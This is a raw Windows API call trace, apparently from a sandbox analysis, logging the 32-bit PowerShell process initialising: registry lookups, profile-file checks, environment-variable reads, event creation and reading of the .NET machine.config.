	[0230.362] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaecd4, lpData=0x0, lpcbData=0xaecd0*=0x0 | out: lpType=0xaecd4*=0x1, lpData=0x0, lpcbData=0xaecd0*=0x56) returned 0x0
	[0230.362] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaecd4, lpData=0x3582a0, lpcbData=0xaecd0*=0x56 | out: lpType=0xaecd4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xaecd0*=0x56) returned 0x0
	[0230.362] RegCloseKey (hKey=0x3d8) returned 0x0
	[0230.363] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xaec8c | out: phkResult=0xaec8c*=0x3d8) returned 0x0
	[0230.363] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaecd4, lpData=0x0, lpcbData=0xaecd0*=0x0 | out: lpType=0xaecd4*=0x1, lpData=0x0, lpcbData=0xaecd0*=0x56) returned 0x0
	[0230.363] RegQueryValueExW (in: hKey=0x3d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaecd4, lpData=0x3582a0, lpcbData=0xaecd0*=0x56 | out: lpType=0xaecd4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xaecd0*=0x56) returned 0x0
	[0230.363] RegCloseKey (hKey=0x3d8) returned 0x0
	[0230.372] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3582a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0230.374] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0230.374] GetLastError () returned 0x3f0
	[0230.375] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3582a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0230.375] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xae824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0230.375] GetLastError () returned 0x3f0
	[0230.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xae8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0230.376] GetLastError () returned 0x3f0
	[0230.376] SetErrorMode (uMode=0x1) returned 0x1
	[0230.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaed3c | out: lpFileInformation=0xaed3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.376] GetLastError () returned 0x2
	[0230.376] SetErrorMode (uMode=0x1) returned 0x1
	[0230.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xae8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0230.376] GetLastError () returned 0x2
	[0230.376] SetErrorMode (uMode=0x1) returned 0x1
	[0230.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaed3c | out: lpFileInformation=0xaed3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.377] GetLastError () returned 0x2
	[0230.377] SetErrorMode (uMode=0x1) returned 0x1
	[0230.377] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xae8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0230.377] GetLastError () returned 0x2
	[0230.377] SetErrorMode (uMode=0x1) returned 0x1
	[0230.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaed3c | out: lpFileInformation=0xaed3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.377] GetLastError () returned 0x3
	[0230.377] SetErrorMode (uMode=0x1) returned 0x1
	[0230.377] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xae8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0230.377] GetLastError () returned 0x3
	[0230.377] SetErrorMode (uMode=0x1) returned 0x1
	[0230.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xaed3c | out: lpFileInformation=0xaed3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.377] GetLastError () returned 0x3
	[0230.377] SetErrorMode (uMode=0x1) returned 0x1
	[0230.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.378] GetLastError () returned 0xcb
	[0230.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.380] GetLastError () returned 0xcb
	[0230.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.530] GetLastError () returned 0xcb
	[0230.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.532] GetLastError () returned 0xcb
	[0230.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.533] GetLastError () returned 0xcb
	[0230.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.538] GetLastError () returned 0xcb
	[0230.538] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1f0
	[0230.538] GetLastError () returned 0x0
	[0230.538] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1f8
	[0230.538] GetLastError () returned 0x0
	[0230.538] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1f4
	[0230.538] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x354
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x360
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364
	[0230.539] GetLastError () returned 0x0
	[0230.539] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0230.539] GetLastError () returned 0x0
	[0230.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.541] GetLastError () returned 0xcb
	[0230.542] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0230.542] GetLastError () returned 0xcb
	[0230.543] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xaed7c | out: lpMode=0xaed7c) returned 1
	[0230.544] GetLastError () returned 0xcb
	[0230.546] SetEvent (hEvent=0x3c4) returned 1
	[0230.546] GetLastError () returned 0xcb
	[0230.546] SetEvent (hEvent=0x1f0) returned 1
	[0230.546] GetLastError () returned 0xcb
	[0230.546] SetEvent (hEvent=0x1f8) returned 1
	[0230.547] GetLastError () returned 0xcb
	[0230.547] SetEvent (hEvent=0x1f4) returned 1
	[0230.547] GetLastError () returned 0xcb
	[0230.547] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0230.547] GetLastError () returned 0x0
	[0230.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.548] GetLastError () returned 0xcb
	[0230.549] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xaebe0 | out: phkResult=0xaebe0*=0x370) returned 0x0
	[0230.549] RegQueryValueExW (in: hKey=0x370, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xaec28, lpData=0x0, lpcbData=0xaec24*=0x0 | out: lpType=0xaec28*=0x0, lpData=0x0, lpcbData=0xaec24*=0x0) returned 0x2

Thread:
	id = 235
	os_tid = 0xb7c


Thread:
	id = 238
	os_tid = 0xa44


Thread:
	id = 242
	os_tid = 0xbbc


Thread:
	id = 244
	os_tid = 0xb8c


Thread:
	id = 247
	os_tid = 0xa40

	[0198.495] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0223.534] LocalFree (hMem=0x344ae0) returned 0x0
	[0223.534] GetLastError () returned 0x0
	[0223.534] CloseHandle (hObject=0x354) returned 1
	[0223.535] GetLastError () returned 0x0
	[0223.535] CloseHandle (hObject=0x13) returned 1
	[0223.535] GetLastError () returned 0x0
	[0223.535] CloseHandle (hObject=0xf) returned 1
	[0223.536] GetLastError () returned 0x0
	[0223.536] RegCloseKey (hKey=0x334) returned 0x0
	[0223.536] RegCloseKey (hKey=0x330) returned 0x0
	[0223.536] RegCloseKey (hKey=0x32c) returned 0x0
	[0223.536] LocalFree (hMem=0x344b00) returned 0x0
	[0223.536] GetLastError () returned 0x0
	[0223.536] RegCloseKey (hKey=0x358) returned 0x0
	[0224.870] RegCloseKey (hKey=0x358) returned 0x0
	[0227.582] RegCloseKey (hKey=0x3a8) returned 0x0
	[0227.582] RegCloseKey (hKey=0x3a4) returned 0x0
	[0227.583] RegCloseKey (hKey=0x3a0) returned 0x0
	[0227.583] RegCloseKey (hKey=0x330) returned 0x0
	[0227.583] RegCloseKey (hKey=0x3d4) returned 0x0
	[0227.583] RegCloseKey (hKey=0x3d0) returned 0x0
	[0227.584] RegCloseKey (hKey=0x398) returned 0x0
	[0227.584] RegCloseKey (hKey=0x394) returned 0x0
	[0227.584] RegCloseKey (hKey=0x390) returned 0x0
	[0227.585] RegCloseKey (hKey=0x38c) returned 0x0
	[0227.585] RegCloseKey (hKey=0x388) returned 0x0
	[0227.585] RegCloseKey (hKey=0x384) returned 0x0
	[0227.586] RegCloseKey (hKey=0x380) returned 0x0
	[0227.586] RegCloseKey (hKey=0x37c) returned 0x0
	[0227.586] RegCloseKey (hKey=0x3cc) returned 0x0
	[0227.587] RegCloseKey (hKey=0x374) returned 0x0
	[0227.587] RegCloseKey (hKey=0x370) returned 0x0
	[0227.587] RegCloseKey (hKey=0x36c) returned 0x0
	[0227.588] RegCloseKey (hKey=0x368) returned 0x0
	[0227.588] RegCloseKey (hKey=0x364) returned 0x0
	[0227.588] RegCloseKey (hKey=0x360) returned 0x0
	[0227.589] RegCloseKey (hKey=0x354) returned 0x0
	[0227.589] RegCloseKey (hKey=0x334) returned 0x0
	[0227.589] RegCloseKey (hKey=0x3c8) returned 0x0
	[0227.589] RegCloseKey (hKey=0x32c) returned 0x0
	[0227.590] RegCloseKey (hKey=0x358) returned 0x0
	[0227.590] RegCloseKey (hKey=0x3c4) returned 0x0
	[0227.590] RegCloseKey (hKey=0x3c0) returned 0x0
	[0227.591] RegCloseKey (hKey=0x39c) returned 0x0
	[0227.591] RegCloseKey (hKey=0x3d8) returned 0x0
	[0227.591] RegCloseKey (hKey=0x3b8) returned 0x0
	[0227.592] RegCloseKey (hKey=0x3b4) returned 0x0
	[0227.592] RegCloseKey (hKey=0x3b0) returned 0x0
	[0227.592] RegCloseKey (hKey=0x3ac) returned 0x0
	[0231.077] RegCloseKey (hKey=0x370) returned 0x0
	[0238.064] CloseHandle (hObject=0x3e8) returned 1
	[0238.064] GetLastError () returned 0x0
	[0238.064] CloseHandle (hObject=0x3e4) returned 1
	[0238.064] GetLastError () returned 0x0
	[0238.065] CloseHandle (hObject=0x3d4) returned 1
	[0238.065] GetLastError () returned 0x0
	[0238.065] CloseHandle (hObject=0x3d0) returned 1
	[0238.065] GetLastError () returned 0x0
	[0238.066] CloseHandle (hObject=0x398) returned 1
	[0238.066] GetLastError () returned 0x0
	[0238.066] CloseHandle (hObject=0x394) returned 1
	[0238.066] GetLastError () returned 0x0
	[0238.066] CloseHandle (hObject=0x390) returned 1
	[0238.066] GetLastError () returned 0x0
	[0238.067] CloseHandle (hObject=0x388) returned 1
	[0238.067] GetLastError () returned 0x0
	[0238.067] CloseHandle (hObject=0x38c) returned 1
	[0238.067] GetLastError () returned 0x0
	[0238.068] CloseHandle (hObject=0x370) returned 1
	[0238.068] GetLastError () returned 0x0
	[0258.366] CoGetContextToken (in: pToken=0x4abf6e8 | out: pToken=0x4abf6e8) returned 0x0
	[0258.366] CoGetContextToken (in: pToken=0x4abf678 | out: pToken=0x4abf678) returned 0x0
	[0258.366] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x0
	[0258.366] CoGetContextToken (in: pToken=0x4abf678 | out: pToken=0x4abf678) returned 0x0
	[0258.367] IUnknown:Release (This=0x626d4a0) returned 0x1
	[0258.367] CoGetContextToken (in: pToken=0x4abf644 | out: pToken=0x4abf644) returned 0x0
	[0258.367] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x1
	[0258.367] IUnknown:Release (This=0x626cb34) returned 0x0
	[0258.526] CloseHandle (hObject=0x4c8) returned 1
	[0258.526] GetLastError () returned 0x0
	[0258.527] CloseHandle (hObject=0x4cc) returned 1
	[0258.527] GetLastError () returned 0x0

Thread:
	id = 312
	os_tid = 0xcc8


Thread:
	id = 314
	os_tid = 0xcd0

	[0230.665] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0230.701] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0230.839] VirtualQuery (in: lpAddress=0x5eae370, lpBuffer=0x5eaf370, dwLength=0x1c | out: lpBuffer=0x5eaf370*(BaseAddress=0x5eae000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.948] GetLastError () returned 0xcb
	[0230.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.953] GetLastError () returned 0xcb
	[0230.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.955] GetLastError () returned 0xcb
	[0231.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.045] GetLastError () returned 0xcb
	[0231.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.047] GetLastError () returned 0xcb
	[0231.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.049] GetLastError () returned 0xcb
	[0231.064] VirtualQuery (in: lpAddress=0x5eae48c, lpBuffer=0x5eaf48c, dwLength=0x1c | out: lpBuffer=0x5eaf48c*(BaseAddress=0x5eae000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0231.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.065] GetLastError () returned 0xcb
	[0231.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.164] GetLastError () returned 0xcb
	[0231.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.164] GetLastError () returned 0xcb
	[0231.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.172] GetLastError () returned 0xcb
	[0231.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.330] GetLastError () returned 0xcb
	[0231.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.447] GetLastError () returned 0xcb
	[0231.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.449] GetLastError () returned 0xcb
	[0231.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.450] GetLastError () returned 0xcb
	[0231.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.453] GetLastError () returned 0xcb
	[0231.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.454] GetLastError () returned 0xcb
	[0231.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.456] GetLastError () returned 0xcb
	[0231.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.457] GetLastError () returned 0xcb
	[0231.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.593] GetLastError () returned 0xcb
	[0232.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.384] GetLastError () returned 0xcb
	[0232.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.387] GetLastError () returned 0xcb
	[0234.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5eae2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0234.842] GetLastError () returned 0xcb
	[0234.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5eae260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0234.842] GetLastError () returned 0xcb
	[0234.845] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x390a68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0234.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5eae2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0234.845] GetLastError () returned 0x0
	[0234.985] GetCurrentProcess () returned 0xffffffff
	[0234.985] GetLastError () returned 0x3f0
	[0234.985] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae3f8 | out: TokenHandle=0x5eae3f8*=0x370) returned 1
	[0234.985] GetLastError () returned 0x3f0
	[0234.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5eadf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0234.991] GetLastError () returned 0x0
	[0235.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5eae438 | out: lpFileInformation=0x5eae438*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0235.082] GetLastError () returned 0x0
	[0235.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5eadf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0235.096] GetLastError () returned 0x0
	[0235.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5eae434 | out: lpFileInformation=0x5eae434*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0235.105] GetLastError () returned 0x0
	[0235.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5eade9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0235.105] GetLastError () returned 0x0
	[0235.106] SetErrorMode (uMode=0x1) returned 0x1
	[0235.106] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x38c
	[0235.106] GetLastError () returned 0x0
	[0235.106] GetFileType (hFile=0x38c) returned 0x1
	[0235.106] SetErrorMode (uMode=0x1) returned 0x1
	[0235.106] GetFileType (hFile=0x38c) returned 0x1
	[0235.116] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x5eae408 | out: lpFileSizeHigh=0x5eae408*=0x0) returned 0x60ed
	[0235.116] GetLastError () returned 0x0
	[0235.116] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae3c0, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae3c0*=0x1000, lpOverlapped=0x0) returned 1
	[0235.116] GetLastError () returned 0x0
	[0235.219] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae078, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae078*=0x1000, lpOverlapped=0x0) returned 1
	[0235.219] GetLastError () returned 0x0
	[0235.220] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae078, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae078*=0x1000, lpOverlapped=0x0) returned 1
	[0235.220] GetLastError () returned 0x0
	[0235.220] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae078, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae078*=0x1000, lpOverlapped=0x0) returned 1
	[0235.220] GetLastError () returned 0x0
	[0235.221] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae078, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae078*=0x1000, lpOverlapped=0x0) returned 1
	[0235.221] GetLastError () returned 0x0
